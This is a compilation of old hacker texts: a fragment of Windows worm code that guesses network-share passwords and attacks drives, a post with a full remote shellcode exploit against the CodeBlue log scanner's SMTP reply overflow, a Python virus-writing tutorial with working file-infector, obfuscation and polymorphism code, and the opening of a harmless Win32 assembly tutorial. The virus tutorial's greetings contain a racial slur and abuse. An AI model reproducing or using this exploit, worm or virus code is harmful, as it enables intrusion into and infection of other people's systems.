                lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
                dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
                    if ( dwResultEnum == NO_ERROR )
                    {
                        for( DWORD i = 0; i < cEntries; i++ )
                        {
                                if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
                                {
                                    propogateNet( &lpnrLocal[i] );
                                } else if( RESOURCETYPE_DISK  == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
                                {
                                    if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
                                    {
                                        // try all found password/username combinations…
                                        printf(“ERROR_INVALID_PASSWORD “); printf(“ATTACKING: %s\n”,lpnrLocal[ i ].lpRemoteName );
                                            if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
                                            {
                                                attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                                WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                            }
                                    } else {
                                        attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                        WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                        printf(“ACCESS NOT DENIED “); printf(“ATTACKING: %s\n”,lpnrLocal[ i ].lpRemoteName );
                                    }
                                }
                        }
                    } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
                        break;
                    }
            } while( dwResultEnum != ERROR_NO_MORE_ITEMS );
        GlobalFree( (HGLOBAL) lpnrLocal );
        WNetCloseEnum( hEnum );
        return;
}
//—————————————————————————-//
int crackNetShare( char * share )
{
        /* Share-password guesser.  Tries every harvested entry in
           passwordList[0..index-1] as the password for `share` (no user
           name).  Returns 0 on the first NO_ERROR from WNetAddConnection(),
           leaving that connection up for attackDrive() to use; -1 if none
           worked.  The second half of the condition can never change the
           outcome once retval == NO_ERROR -- the author's own "dodgy
           testing" note. */
        int retval = 0;
            for( int i=0 ; i<index ; i++ )
            {
                retval = WNetAddConnection( share , passwordList[i], NULL );
                if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD )   // <—– !!! dodgy testing, fix it
                {
                    printf(“PASS CRACKED: %s : %s\n”, share , passwordList[i]);
                    return 0;
                }
            }
        return -1;
}
//—————————————————————————-//
void releasePayload()
{
        /* "Payload" hook reached by WormGameThread() after
           WORMGAME_MAX_WINS wins.  In this version it only writes a
           banner to stdout; nothing else happens. */
        fputs( "\n\t!!! PAYLOAD !!!\n", stdout );
}
//—————————————————————————-//


Code Blue v5.0 source

Posted on October 10, 2008 by admin | No Comments

CODE BLUE

$ cd codeblue
$ ls
CHANGES COPYING Makefile README codeblue.c
$ head COPYING
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

/* uh-oh */

$ vi codeblue.c
/*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01
* root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]-
*
******************************************************************************************
*
* CodeBlue v5.0 by Michael (mystic@tenebrous.com)
* This software is freely distributable under the terms of the GNU/GPL.
* Please see file ‘COPYING’

/* god bless america, AND mystical mike! */

….

/* line ~273 */
/*
 * signal_init:
 * installs signal_handler (defined elsewhere in codeblue.c) for
 * SIGINT and SIGPIPE, with an empty mask and no SA_* flags.  The
 * previous disposition is written to sa_old each time and then
 * discarded.  One handler serves both signals -- see the note below.
 */
void signal_init(void)
{
struct sigaction sa_old, sa_new;

/* signal handling */
sa_new.sa_handler = signal_handler;
sigemptyset(&sa_new.sa_mask);
sa_new.sa_flags = 0;
sigaction(SIGINT, &sa_new, &sa_old);
sigaction(SIGPIPE, &sa_new, &sa_old);
}

/* shared signal handler doing all sorts of stuff, not very good mike :( */

/* line ~289 */

/*********************************************************************
 * Our close() wrapper: hands the descriptor to close(2) and returns
 * its result unchanged (0 on success, -1 with errno set otherwise).
 */
int Close(int sd)
{
	int rc;

	rc = close(sd);
	return rc;
}

/* that just made me laugh */

/* line ~661 */

char logline[512]; /* logline is global */

int scan_file(FILE * fp)
{
char buffer[1024];

….

fgets(buffer, 1024, fp);

….

if (found_infected == 1) { /* if it picks up a worm entry in the */
/* log this is true */

strcpy(logline, buffer);

/* oh dear */

/* line ~827 */

char reply[512]; /* global */
char whoispath[512] = “/usr/bin/whois”; /* global */

int main(int argc, char **argv)
{

…..

if (argv[i][0] == ‘-’)
switch (argv[i][1]) {
case ‘e’:{ /* return email address */
if ((!argv[i + 1]) || (argv[i + 1][0] == ‘-’))
DieWithRequire(argv[i]);
strcpy(reply, argv[i + 1]);
break;
}
case ‘p’:{ /* path to whois binary */
if ((!argv[i + 1]) || (argv[i + 1][0] == ‘-’))
DieWithRequire(argv[i]);
strcpy(whoispath, argv[i + 1]);
break;
}

/* whoops! */

Now, all this is good for a laugh, but unless the binary is installed setuid, overflowing it through its own command-line arguments gains nothing :(

CodeBlue scans Apache/Squid log files looking for Code Red and Nimda
hits. If it finds one, it connects to the source IP address of the hit
and sends an e-mail warning of infection. Unfortunately, mystical mike was too
far up on his high horse to write something decent.

The function that does this is send_email() (line ~552)

It starts off like this:

int send_email(void)
{
int sd;
char *host = malloc(sizeof(char) * 512);

/* …. silly crap using popen and stuff …. */

/* host is the infected host from the logfiles
* this will connect to the host on port 25
*/

if ((sd = smtp_connect(host)) < SUCCESS)
return -1;

/* Step 0 – Get initial server response */
get_smtp_reply(sd);

/* this is the function of interest */

/* line ~345 */
/*********************************************************************
* fetches a reply from the SMTP server
*/
int get_smtp_reply(int sd)
{
char response[1024]; /* this is the remote host’s mail server buf */

….

/* props to dme!!! */

/*
* We’ll loop infinately, receiving
* 1 byte at a time until we receive a carriage return
* or line-feed character, signifying the end of the output
*/
/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */

….

while (TRUE) {
if (select((sd + 1), &rset, NULL, NULL, &tv) < 0) {
if (errno != EINPROGRESS) {
fprintf(stderr, “[ ERROR: select() failed: %s\n",
strerror(errno));
return -1;
}
}
if (recv(sd, (int *) &response[i], 1, RECV_FL) < 0) { /* Hello */
if (errno == EAGAIN) {
if (elapsed >= smtp_timeout) {
fprintf(stderr, “[ ERROR: operation timed out\n");
fprintf(log, "..... ERROR: operation timed out\n");
return -1;
}
elapsed++;
usleep(smtp_timeout * 10000);
continue;
} else {
if (!(flags & FL_BEQUIET))
fprintf(stderr, "[ ERROR: recv() failed: %s\n",
strerror(errno));
fprintf(log, "..... ERROR: recv() failed: %s\n",
strerror(errno));
return -1;
}
}
if ((response[i] == ‘\n’)
|| ((response[i] == ‘\n’) && (response[i + 1] == ‘\n’)))
break;
i++; /* come here often baby? */
}

So slowly but surely, response is overrun: `i` is bumped once per received
byte and is never compared against sizeof(response) (1024), so any server
reply that does not contain a newline within its first 1024 bytes runs
straight off the end of the stack buffer. (The `\n\n` half of the exit test
is dead code -- it can only be reached when the first `\n` clause already
matched -- and the `(int *)` cast on the recv() destination is meaningless,
recv() takes a void *.)

/*
* hi, this is an exploit that doesn't work as-is (it relies on a single
* hard-coded stack address, lunix_resp, so it is only right for whatever
* build it was measured against). it should be enough of a point in
* the right direction though. the overflow is in get_smtp_reply(): the reply
* is recv()ed one byte at a time into a 1024-byte stack buffer and the index
* is never bounded. codeblue.c is pretty damn poor, there are more!!!
*
* being in a funny mood one afternoon, i made some software publicly
* available, the next morning i see this in my mailbox:
*
* ——- begin spouting off ——
* From mystic@tenebrous.com Mon Jul 22 19:50:46 2002
* Return-Path:
* Delivered-To: doe@orbital.wiretapped.net
* Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000
* Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)
* (205.152.58.50)
* by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000
* Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net
* (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
* id <20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels>
* for ; Mon, 22 Jul 2002 15:51:43 -0400
* From: “Michael”
* To: “‘Demi Sex God from Hell’”
* Subject: RE: ass the attack spoofing shell
* Date: Mon, 22 Jul 2002 15:50:13 -0400
* Message-ID: <000101c231b8$fedc7740$0200a8c0@Michaels>
* MIME-Version: 1.0
* Content-Type: text/plain;
* charset=”us-ascii”
* Content-Transfer-Encoding: 7bit
* X-Priority: 3 (Normal)
* X-MSMail-Priority: Normal
* X-Mailer: Microsoft Outlook, Build 10.0.2616
* Importance: Normal
* X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
* In-Reply-To:
* Status: RO
*
* Annoying. Pointless.
*
* ——- end spouting off ——-
*
* HOW RUDE!@##@!@#!
*
* so i had a visit to www.tenebrous.com, found some software written by this
* master coder, and here we are now. hehehe
*
* To use this against a webserver (A) using codeblue.
*
* $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
*
* this will add an entry in the access log.
*
* ON THE SAME HOST:
*
* # ./mystic_anus 25
*
* wait a while.
*
* when codeblue runs it will pull your ip from the logs, connect to your port
* 25 and try to send you a mail. because mystic is an idiot, the fake banner
* overflows get_smtp_reply()'s buffer and you get a shell. (note: as listed,
* main() selects lunix_shellcode/lunix_resp; the openbsd payload and bsd_resp
* are declared but never used, so the "openbsd code" needs wiring in first.)
*
* if codeblue is running nightly from roots crontab, you will get a
* rootshell!!!
*
* i like exclamation marks !!!!
*
* krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,
* everyone on #cw , everyone in paris (you have a lovely city, i had a lovely
* time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,
* hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who
* lives in london, marlinspike (yo!), the woman who sells me my cigarettes in
* the morning on the way into work, thomas greene, dedmunk, adam, durab.
*
* BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!
*
* propz to dme#!@#!@
*
* dont forget:
*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]- *
******************************************************************************************
*
*/
/* this is almost as shoddy as mystical mikes code */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

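#define OF 2048 /* this is bigger than needed: main() only builds 1036 bytes of it */

/* Optimized the code, now it works better in bad situations */
/* i dont know who wrote this, sorry, if you wrote it, let me know */

/*
 * x86 payload using int 0x80 system calls (Linux): 129 bytes, contains
 * no NUL byte, and ends in the literal "/bin/sh".  This is the payload
 * main() actually selects.  The quote characters of the original listing
 * were mangled by the web rendering (U+201C/U+2033); restored here so
 * the array is valid C.
 */
char lunix_shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/*
 * shell on port 6969/tcp shellcode for OpenBSD by noir
 *
 * 37 little-endian 32-bit words.  Declared as long[], which is only a
 * contiguous byte string on ILP32 targets; on LP64 each element is
 * 8 bytes and the code would be interleaved with zero padding.  Not
 * selected by main() in this listing.  Two of the constants were
 * rendered with U+00D7 instead of 'x'; fixed.
 */
long bsd_shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};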

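/*
 * Listener that serves the overflow to codeblue's get_smtp_reply().
 *
 * Usage: mystic_anus [port]   (default 25: codeblue connects to port 25 of
 * whatever source address it pulled out of the web server log).
 *
 * On every accepted connection it writes one fake SMTP banner laid out as:
 *
 *   offset    0 ..    3   "220 "                (looks like a server greeting)
 *   offset    4 .. 1023   NOP sled + shellcode  (exactly fills the target's
 *                                                1024-byte response[] buffer)
 *   offset 1024 .. 1031   resp, twice           (the 8 bytes just past that
 *                                                buffer; presumably saved EBP
 *                                                and return address -- frame
 *                                                layout is compiler dependent)
 *   offset 1032 .. 1035   "\n\n\n\n"            (the target's loop stops at the
 *                                                first '\n', i.e. only after
 *                                                the overwrite)
 *
 * resp is a single hard-coded stack address (lunix_resp + 8); it is only
 * right for the build it was measured on and not at all under ASLR, which
 * is why the header comment calls this "an exploit that doesnt work".  Only
 * the Linux payload is wired up; the original also declared an unused
 * bsd_resp = 0xdfbfc068 for the OpenBSD payload.
 *
 * Exits with 1 on a usage or socket error; otherwise never returns.
 */
int main(int argc, char *argv[])
{
	struct sockaddr_in sock_in;
	struct sockaddr_in sock_out;
	char *port = "25";
	int fd, a;
	socklen_t len;			/* accept() takes socklen_t *, not int * */
	int opt;
	char bigbuf[OF];
	char *p;
	long lunix_resp = 0xbfffe0ac;
	char *moo = "220 ";
	size_t sclen;

	long resp = lunix_resp;
	char *shellcode = lunix_shellcode;

	sclen = strlen(shellcode);
	printf("strlen scode = %zu\n", sclen);	/* %zu: strlen() returns size_t */
	if (argc == 2)
		port = argv[1];

	if (argc > 2) {
		fprintf(stderr, "usage: %s [port]\n", argv[0]);
		exit(1);
	}

	/* the sled is sized as 1020 - strlen(); a longer payload would wrap
	 * that size_t and memset() far past the end of bigbuf */
	if (sclen > 1020) {
		fprintf(stderr, "shellcode too long (%zu > 1020)\n", sclen);
		exit(1);
	}

	resp += 8;

	/* Zero the whole buffer first: the original sent sizeof(bigbuf) bytes
	 * but only built 1036 of them, leaking uninitialised stack to the peer. */
	memset(bigbuf, 0, sizeof(bigbuf));
	p = bigbuf;
	memcpy(p, moo, 4);			/* "220 " */
	p += 4;
	memset(p, '\x90', 1020 - sclen);	/* NOP sled up to offset 1024 - strlen */
	p += 1020 - sclen;
	memcpy(p, shellcode, sclen);		/* payload ends exactly at offset 1024 */
	p += sclen;
	memcpy(p, &resp, 4);			/* low 4 bytes of a long: little-endian host assumed */
	p += 4;
	memcpy(p, &resp, 4);
	p += 4;
	memset(p, '\n', 4);			/* terminator the target's byte loop stops on */

	if ((fd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket");
		exit(1);
	}

	memset(&sock_in, 0, sizeof(sock_in));
	sock_in.sin_family = AF_INET;
	sock_in.sin_port = htons(atoi(port));
	sock_in.sin_addr.s_addr = INADDR_ANY;	/* listen on every interface */
	len = sizeof(sock_in);

	opt = 1;	/* SO_REUSEADDR: allow a quick restart while old connections sit in TIME_WAIT */
	if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(int)) == -1) {
		perror("setsockopt");
		exit(1);
	}

	if (bind(fd, (struct sockaddr *)&sock_in, len) < 0) {
		perror("bind");
		exit(1);
	}

	if (listen(fd, 5) < 0) {
		perror("listen");
		exit(1);
	}

	printf("listening on port %d\n", atoi(port));

	for (;;) {
		len = sizeof(sock_out);
		if ((a = accept(fd, (struct sockaddr *)&sock_out, &len)) < 0) {
			perror("accept");
			exit(1);
		}
		printf("got a connection from %s\n", inet_ntoa(sock_out.sin_addr));
		fflush(stdout);

		/* one shot per connection; a short or failed write is reported, not retried */
		if (write(a, bigbuf, sizeof(bigbuf)) != (ssize_t)sizeof(bigbuf))
			perror("write");
		close(a);
	}

	return(1);	/* not reached */

}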

Python Virus Writing Tutorial


Python Virus Writing Tutorial
By VortX 2005

-Python?
-Python Appender
-Python Prepender Virus
-Virus As ASCII Numbers
-Using Variables To Encrypt
-Adding Trash
-snizzle p00p niggar

I warn you: This is the first tutorial i have ever written, 
so i guess it will be a bit shit!

Python?

Python is a freeware powerful interpreted programming language available for most operating systems.
It is object-oriented, interactive, portable and easy to learn. It is also popular as a CGI scripting
language, as its capabilities compare favorably with those of Perl (Not that i code perl)
It can be interpreted in a number of operating systems, this makes very good idea for future viruses
So erm, lets go!

Python Appender Virus:

Here i will show you a small appender. Appenders are a type of standard file infection along
with prepender and the lame overwriters (that no one really likes!) Damnit :p
Appending means to write the virus code after the normal code, therefore, the virus is run
after the hostcode.

<><><><><><><><><><><><><><><><><><><><><><><><><><>
Code:
Code:
# Appender: copies every line of the running file that carries the trailing
# hash-bang marker onto the end of each *.py / *.pyw in the current
# directory that does not already contain the infection marker.
# NOTE(review): Python 2 code -- string.find() and `from string import *`
# do not exist in Python 3.
import glob #!
from string import * #!
# The glob includes the running file itself; the marker test below skips it.
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
# `for Files in Files` rebinds the list name to each element; it works only
# because the iterator was created before the rebinding.
for Files in Files: #!
   # Reopened on every iteration; closed inside the inner loop.
   vCode = open(__file__, 'r') #!
   # Opened read-only first, then reopened for append without closing this handle.
   victim = open (Files, 'r') #!
   readvictim = victim.read() #!
   # Infection marker: the literal below sits on a marked line, so it is copied
   # into every victim and this test then fails for that file on later runs.
   if find(readvictim, "-=::Vort3x::=-") == -1: #!
       victim = open(Files, 'a') #!
       # readlines() slurps the whole file, so closing vCode mid-loop is safe.
       for code in vCode.readlines(): #!
            # Every line containing the hash-bang sequence is treated as virus
            # code -- including a host's shebang line, if the running file has one.
            if ("#!") in code: #!
                vCode.close() #!
                mycode=(chr(10)+code) #!
                # victim is never closed explicitly; the interpreter flushes it on exit.
                victim.write(mycode) #!

<><><><><><><><><><><><><><><><><><><><><><><><><><><>
Here is how it works:

1: Searches for files (py / pyw) in the current directory (the running file itself is included, but the marker test skips it)
2: Looks inside those files for the infection marker. Note: this virus has 2 markers, I'll explain later
3: Finds its own code
4: Opens the uninfected files and writes its code to the end of the normal code.
5: Closes its own file handle (the victim handle is left for the interpreter to close).. finished!

Why it has 2 markers: Well, the ones you notice the most are the virus code markers, we use these to
know what code to infect other files with. The virus will only copy the code that has "#!" at the end of
each line, understand? there are other ways of doing this but blah it works
Then we have the infection marker "-=::Vort3x::=-" this is so we can see if the file has already been infected.
If we dont use any infection marker, bad things will happen!!  Such as your virus re-appending to files. :O
Then you end up with HUGE files, growing in size each time its executed!

Python Prepender Virus

Prependers are again standard infection types. All this does is add its code to the top of the
infected file

<><><><><><><><><><><><>
<><><><><><><><><><><><><><>
Code:
Code:
# Prepender: rewrites every *.py / *.pyw in the current directory so that
# this script's own body comes first and the original host code follows.
# NOTE(review): Python 2 code -- string.find() and `from string import *`
# do not exist in Python 3.
import glob
from string import *
x = glob.glob("*.py") + glob.glob("*.pyw")
for x in x:
    host = open(x, 'r')
    hostcode = host.read()
    # Infection marker; the literal is part of the copied body, so an
    # infected host fails this test on the next run.
    if find(hostcode, "-=::VortX::=-") == -1:
        # 'w' truncates the host before its replacement is assembled; the
        # read-only handle above is never closed.
        host = open(x, 'w')
        myself = open(__file__, 'r')
        a = myself.read()
        # 105 is the number of characters from the first occurrence of the
        # marker literal (in the slice below) to the end of the trailing marker
        # line.  It is exact only for this layout -- 8-space indents, LF line
        # endings, nothing inserted between here and the marker -- so do not
        # edit or comment those lines.
        num=50*2+5
        a = a[:find(a, "#VORTX")+num]
        mybody=a+chr(10)+hostcode
        myself.close()
        host.write(mybody)
#VORTX

<><><><><><><><><><><
><><><><><><><><><><><><><><><>
So:
-We search for files
-Open the files and read their contents
-Store the code in a variable
-Open Myself (yahahaha Confused )
-Read my body and store it in a variable
-Open the file(s) that haven't been infected (for writing); they are the files that don't have "-=::VortX::=-" inside!
-Count the number of characters the virus code is long, up to the virus marker "#VORTX" (that is what the 105 is: it is exact only for this layout, so don't reformat those lines)
-Store everything into a new variable, write the virus code to the file and append the normal code
 to the end of the virus code.

Hmm hope that makes sense? its really easy.. think about it, play with the code

Virus As ASCII Numbers:

This method is easy and common in scripting languages. We change the code to its ASCII numbers.
Erm apart from spending hours encrypting it.. its easy  That's why it's a good idea to make your own
encryption tool  Made mine in VB, it saved time!!!! Very Happy but i think there is something like
that on VX Heaven, if you cant make your own? but you will need to play with the code a bit to make
it work in python. (Strictly this is obfuscation, not encryption: there is no key, and anyone can
recover the source by printing, instead of eval()ing, the chr() expression.)

<><><><><><><><>
<><><><><><><><><><><><><><><><><><>Code:

Code:
# "Encryption" by ASCII codes: each chr() is one character of the source
# text, joined with + and handed to eval().  Decoded, the string is
#     raw_input("Im VortX, Welcome to my world!")
# so this is reversible obfuscation with no key, not encryption.
# NOTE(review): raw_input() is Python 2 only (input() in Python 3).
eval(chr(114)+chr(97)+chr(119)+chr(95)+chr(105)+chr(110)+chr(112)+chr(117)+chr(116)+chr(40)+chr(34)+chr(73)+chr(109)
+chr(32)+chr(86)+chr(111)+chr(114)+chr(116)+chr(88)+chr(44)+chr(32)+chr(87)+chr(101)+chr(108)+chr(99)+chr(111)+chr(109)+chr(101)+chr(32)+chr(116)+chr(111)+chr(32)+chr(109)+chr(121)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41))

<><><><><><><><><
><><><><><><><><><><><><><><><><><>
This code has the "raw_input" command (used for asking user input),
but "print" never seems to
work :/ -- that is because eval() only evaluates *expressions*, and in Python 2 print is a
statement, not a function call (exec would run it). Anywayz, it's hard to read this or know what
it is at a glance, but "decrypting" it is trivial: each chr() is one character, so printing the
string instead of eval()ing it reveals the code. The code uses a function called "eval"; eval
evaluates a string as though it were an expression and returns the result. We use it to run
commands... this is used a lot in "encryption" of this kind!

Using Variables To Encrypt:

Setting your own variable for each character (set of characters)

<><><><><><><><><>
<><><><><><><><><>
<><><><><><><><>
Code:
Code:
# Same idea with named fragments: inside eval() the pieces are concatenated
# in the order dd bb ee aa cc js ff gg hh yu hq js ')' and give back
#     raw_input("hello VXerz")
# Again reversible obfuscation, not encryption.  raw_input() is Python 2 only.
aa="pu"
bb="aw"
cc="t("
dd="r"
ee="_in"
ff="he"
hq="erz"
js=chr(34)
gg="ll"
yu="VX"
hh="o"+chr(32)
eval(dd+bb+ee+aa+cc+js+ff+gg+hh+yu+hq+js+')')

<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Nothing much to say about that, its another encryption.

Adding Trash:

It adds a line of random trash (a comment of random length) before each copied line of the
virus code. Hmm i hate to say it but this code is pretty lame! it does not add its code in random
areas, and the length is picked once per run, so every junk line in one infection has the same length.
But i think it gives a good idea of poly in python!

<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Code:
Code:
# Appender (as above) that precedes every copied line with a comment line of
# random letters, so copies of the virus differ byte-for-byte.
# NOTE(review): Python 2 code -- string.find()/join() and `from string import *`
# do not exist in Python 3.
import glob #!
import random #!
from string import * #!
trash = 'abcdefghijklmnopqrstuvwxyz' #!
# Picked once per run: randrange(10, 20) gives 10..19, and every junk line in
# this run has that same length (the sampled letters still vary per line).
lengh = random.randrange(10, 20) #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
  vCode = open(__file__, 'r') #!
  victim = open (Files, 'r') #!
  readvictim = victim.read() #!
  # Infection marker; the literal is on a marked line, so infected files carry it.
  if find(readvictim, "-=::Vort3x::=-") == -1: #!
      victim = open(Files, 'a') #!
      for code in vCode.readlines(): #!
           if ("#!") in code: #!
               vCode.close() #!
               mycode=(chr(10)+code) #!
               # Written as "#" + junk + "\n" + code line: string.join() separates
               # the sampled letters with spaces, and the newline in mycode puts
               # the copied line on its own line after the junk comment.
               victim.write("#"+join(random.sample(trash, lengh))+mycode) #!

<><><><><><><><><>
<><><><><><><><><><><><><><><><><>
Yokay, ill explain

First we import the "Random module"
Then we set some characters (the letters a-z) into the "Trash" variable
Then we set the length of the random trash (the length is also random, 10 - 19, since randrange excludes 20; note it is chosen once and reused for every line)
Then we write our virus code to the host.
Then we put a comment marker for the trash (bcoz trash is not supposed to be executed!)
 we put each copied line on its own line in the infected file and add random characters
of that random length from the trash variable on the comment line before it, please understand! its not hard

Its very very easy i think! It helps if you learn a little python first befor you start
 bitching about not understanding the code  because im not
about to answer emails asking me what each and every line does! im busy with trying to 
get into a college :/

snizzle p00p niggar:

Hmmm i have been typing this out for almost 2 hours, so, i dont really want to say much more
But, i think Python is a cool language, there is a lot to be done yet. I'd like to see more 
python viruses lazy arse bastards! I should have done more,
 but only today i started learning python again after almost 3 months! :p
Please tell me about any bugs in my code (yea yea!)

Big huge YOUR THE BEST to SPTH my idol!  thx for all the help!!!!!!.. and yes.. im annoying!
HoneyHeart........... for being a good friend
LL............. She;s cool  lolz, i still want ur number
Sinclair........... for allowing me in DCA chan, not that i often go there :/
Blueowl............ For helping me for some time.
hurm1t............ he;s got everything.. worship him  thnx for your sources.. nice!
Nova.......... Lush graphics for my desktop  thank me for all the girls you bastard >
Blueprint............. for hosting my little scripts
Blank.................. for hosting this tutorial *havnt asked yet* but he WILL *Gets the knife* he will!!!!
dr3f.................... Fucking cock sucker!!!!!
AngelArt............. for being a friend  awwww  we are all waitng for your script! Female programmers exist!
Muazzin.............. where the fuck are you? wanted to talk to me, next day ur GONE! :/
Thugstyle................ haha Very Happy
Shree............... did you ENJOY sending porn from MY account!!! wrong time of the month?

And others.. that im afraid to list :X like bliss but he sux so who cares :p

Contact:
STFU
written by Malfunction
  +--------------------+

 Foreword:
 =========

 This tutorial is for the beginner who can already code in assembly
 language and who has already coded real mode DOS programs.
 So it's for someone like me a half year ago. :)
 At that time I was searching for some documentation on Win32 assembly.
 As I searched for this I mostly found assembler tutorials for
 real mode programs. And I found lots of links pointing to Iczelion's
 Win32 assembler tutorial, which is written for MASM and uses
 lots of macro shit. The only Win32 ASM tutorial for TASM I have seen
 so far was written by ... let me think ... I believe he called himself
 Masta ... yes, Masta's Win95 ASM tutorial. That wasn't bad, but it
 didn't explain all the stuff I wanted to know. So I decided to
 write my own little tutorial on the subject. I wrote this with the
 aim to write a very complete tutorial. I hope you'll like it! ;) 

 Coding in Win32 environment
 ===========================

 As you may know Windows runs in protected mode and so our code will
 do so as well. Windows provides a virtual address space of
 theoretically 4GB of memory for every process. The use of this virtual memory
 allows the system to use the hard disk for swapping when the physical
 memory ain't enough. When you code, you code in a so called "flat"
 memory model. This means you don't need to care for the segment registers
 anymore and that makes the ASM coding a hell easier. You only need
 DWORD offsets when you address memory in Win32. In contrast to 16-bit
 systems like DOS and Win 3.1, 32-bit systems use DWORDs as offsets.
 Do not modify the segment registers or your program will fuck up
 with a chance of 99,99%.
 You will use the 32-bit registers much more than before (if you haven't used
 them already before). Let's take the LOOP instruction for example:
 Now the whole ECX will decrement and not only CX. Remember that!
 In protected mode (as the name suggests) the memory can be protected.
 So you may have read/write access, read only access or no access at all.
 Maybe you have coded COM files in the past and you always had all
 your code and your data in one segment. If you try the same here
 it won't work because:
 1) there MUST be something in the data section or the linker will fail
 2) the code section is write protected, so don't put any variables in here
 Many people tried to use interrupts in Win32 inline ASM code. But this
 doesn't work because you don't call REAL MODE interrupts. You would call
 the protected mode INTs and the good old DOS INTs aren't available anymore.
 Instead of INTs you need to use the Windows API. For a complete documentation
 take a look at Microsoft's MSDN (http://msdn.microsoft.com).
 It is a similar case with the I/O ports. Because your program will
 run in privilege level 3 (also called RING-3) you won't be able to access
 most ports directly. Win95/98/ME don't protect all the I/O ports, but WinNT/2K/XP
 do. Your old DOS programs might still be able to use some ports under
 WinNT/2K/XP because those systems run them in Virtual 8086 mode, where
 port access can be trapped and emulated, for compatibility reasons.
 And at last I wanna remind you that you will code CASE SENSITIVE from
 now on! It's just like in C++. :)
 This is really important and so write MessageBoxA please and not mESSAGEboXa
 for example! ;) 

 Hello World! in Win32 ASM
 =========================

 Enough theoretical stuff, let's see some code!

 ; ------ CUT here ----------------------------------------------

.386                                    ; 386+ instruction set; must precede .model
.model flat                             ; flat 32-bit memory model, no segment juggling

        ; Win32 API imports, resolved by the linker from import32.lib.
        ; ExitProcess is exported by kernel32.dll, MessageBoxA by user32.dll.
        extrn ExitProcess:proc
        extrn MessageBoxA:proc

.data

        ; Win32 string parameters are NUL-terminated, hence the trailing 0.
        msg_title   DB "MessageBox title",0
        msg_message DB "Hello World!",0

.code

start:
        ; MessageBoxA(hwndOwner=0, lpszText=msg_message, lpszTitle=msg_title, fuStyle=0)
        ; stdcall: arguments are pushed right-to-left and popped by the callee.
        push 0                          ; fuStyle  (0 = MB_OK)
        push offset msg_title           ; lpszTitle
        push offset msg_message         ; lpszText
        push 0                          ; hwndOwner (no owner window)
        call MessageBoxA                ; result (the button id) is left in EAX, unused here

        push 0                          ; uExitCode = 0
